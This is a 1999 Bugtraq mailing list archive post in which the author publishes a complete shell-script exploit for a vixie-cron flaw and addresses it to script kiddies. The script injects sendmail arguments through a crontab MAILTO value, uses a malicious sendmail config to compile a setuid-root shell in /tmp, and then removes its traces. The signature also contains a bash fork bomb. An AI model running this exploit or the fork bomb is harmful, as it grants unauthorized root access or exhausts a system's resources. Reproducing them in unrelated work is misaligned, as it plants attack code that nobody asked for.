Bugtraq mailing list archives
Root shell vixie cron exploit
From: lcamtuf () IDS PL (Michal Zalewski)
Date: Mon, 5 Jul 1999 14:20:49 +0200
For script kiddiez, here's an exploit for recent vixie-cron vulnerability, giving instant root shell. Thought it will help script kiddies, but as Martin Schulze included almost step-by-step guide how to abuse Sendmail flags, this exploit won't bring anything shocking - simply, it's working example. ** Official statement on my hwclock settings: RTC on my mainboard is ** broken, and I have no cash to replace it with working one :( Just ** execuse me stupid 'Date:' fields in some of my postings... _______________________________________________________________________ Michal Zalewski [lcamtuf () ids pl] [link / marchew] [dione.ids.pl SYSADM] [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] #!/bin/sh clear echo '------------------------------------------------------------------' echo 'Marchew Hyperreal Industries <marchew () dione ids pl>' echo 'Stumilowy Las Team <100milowy () gdynia ids pl>' echo '---------------------------- presents ----------------------------' echo echo ' -= vixie-cron root sploit by Michal Zalewski <lcamtuf () ids pl> =-' echo echo '[+] Checking dependencies:' echo -n ' [*] vixie crontab: ' if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then echo "OK" else echo "NOT FOUND!" exit 1 fi echo -n ' [*] Berkeley Sendmail: ' if [ -f /usr/sbin/sendmail ]; then echo "OK" else echo "NOT FOUND!" exit 1 fi echo -n ' [*] gcc compiler: ' if [ -x /usr/bin/gcc ]; then echo "OK" else echo "NOT FOUND!" exit 1 fi echo ' [?] Dependiences not verified:' echo ' [*] proper version of vixie crontab' echo ' [*] writable /tmp without noexec/nosuid option' echo '[+] Exploit started.' echo "[+] Setting up .cf file for sendmail..." cat >/tmp/vixie-cf <<__eof__ V7/Berkeley O QueueDirectory=/tmp O DefaultUser=0:0 R$+ \$#local $: \$1 regular local names Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40, T=DNS/RFC822/X-Unix, A=vixie-root __eof__ echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...' cat >/tmp/vixie-root <<__eof__ #!/bin/sh gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d chmod 6755 /tmp/vixie-own3d __eof__ chmod 755 /tmp/vixie-root echo '[+] Setting up phase #2 tool (rootshell launcher)...' cat >/tmp/vixie-own3d.c <<__eof__ main() { setuid(0); setgid(0); unlink("/tmp/vixie-own3d"); execl("/bin/sh","sh","-i",0); } __eof__ echo '[+] Putting evil crontab entry...' crontab - <<__eof__ MAILTO='-C/tmp/vixie-cf dupek' * * * * * nonexist __eof__ echo '[+] Patience is a virtue... Wait up to 60 seconds.' ILE=0 echo -n '[+] Tick.' while [ $ILE -lt 50 ]; do sleep 2 let ILE=ILE+1 test -f /tmp/vixie-own3d && ILE=1000 echo -n '.' done echo echo '[+] Huh, done. Removing crontab entry...' crontab -r echo '[+] Removing helper files...' rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null echo '[*] And now...' if [ -f /tmp/vixie-own3d ]; then echo '[+] Entering root shell, babe :)' echo /tmp/vixie-own3d echo else echo '[-] Oops, no root shell found, patched system or configuration problem :(' fi echo '[*] Exploit done.'
Current thread:
- Root shell vixie cron exploit Michal Zalewski (Jul 05)
- Re: Root shell vixie cron exploit Seva Gluschenko (Sep 01)
- Re: Root shell vixie cron exploit Michal Zalewski (Sep 01)
- Re: Root shell vixie cron exploit John Kennedy (Sep 03)
- Re: Root shell vixie cron exploit Peter Wemm (Sep 07)
- Re: Root shell vixie cron exploit Raymond Dijkxhoorn (Sep 07)
- Re: Root shell vixie cron exploit Christos Zoulas (Sep 03)
- [security-officer () FreeBSD ORG: FreeBSD-SA-99:01: BSD File Flags and Programming Techniques] Patrick Oonk (Sep 03)
- Re: Root shell vixie cron exploit Valentin Nechayev (Sep 04)
- gftp Oscar Haeger (Sep 05)
- Re: gftp - ms ftp debug mode Bencsath Boldizsar (Sep 08)
(Thread continues...)
- Re: Root shell vixie cron exploit Seva Gluschenko (Sep 01)